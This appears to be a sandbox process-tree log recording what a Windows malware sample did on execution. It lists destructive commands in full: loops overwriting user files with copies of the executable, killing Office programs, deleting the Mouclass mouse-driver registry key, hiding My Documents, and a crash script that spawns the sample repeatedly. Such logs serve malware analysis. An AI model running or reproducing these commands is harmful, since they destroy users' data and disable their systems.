    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2836
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1B8.tmp\E1B9.tmp\E1BA.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
      4⤵
      PID:10204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:944

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:336
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6142.tmp\6143.tmp\6144.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6728
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:6292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:892
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:9144
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:8764

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:324
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6192.tmp\621E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:2360

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2852
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6107.tmp\6105.tmp\6106.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2064
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:2508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:2580
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6508
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6536
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6648
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6680
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6608
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6636
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6700
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6860
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6412
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:5828
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7084
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7144
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6908
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7196
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7488
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7428
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7384
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7324
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6444
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7568
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7620
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6236
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6428
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7916
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7968
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6824
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:8752
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:8800
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:8892
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:8944
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:8672
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:8720
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:9076
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:2260
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:1824
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:1848
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AB8B.tmp\AB8C.tmp\AB8D.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
      4⤵
      PID:5208
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1920

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2396
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6190.tmp\6191.tmp\6192.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:764

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1364
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\622C.tmp\622D.tmp\624E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:2876

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1732
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6059.tmp\6059.tmp\605A.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:3032
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:4240
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:4724
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:5060
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:5308
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2760

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1092
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\60C6.tmp\60C7.tmp\60C8.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1624
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:3668
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:5228
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:5268
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:4568
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1568

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2296
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6058.tmp\6059.tmp\605A.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4640
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:5808
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:5876
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:6272
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:5504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:8164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2420
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:7724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:884
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E58F.tmp\E58F.tmp\E590.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
      4⤵
      PID:8708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1828

C:\Windows\system32\tskill.exe
tskill excel
1⤵
PID:2948

C:\Windows\system32\tskill.exe
tskill excel
1⤵
PID:2968

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
1⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3444
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1D8.tmp\E1D8.tmp\E1D9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9224

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3484
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C957.tmp\C958.tmp\C959.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7676

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3356
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0DD.tmp\E0FD.tmp\E0FE.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10100

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3312
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E273.tmp\E283.tmp\E284.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8876

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3520
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1C7.tmp\E1C8.tmp\E1C9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10216

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3768
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E6C7.tmp\E6D7.tmp\E6D8.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8964

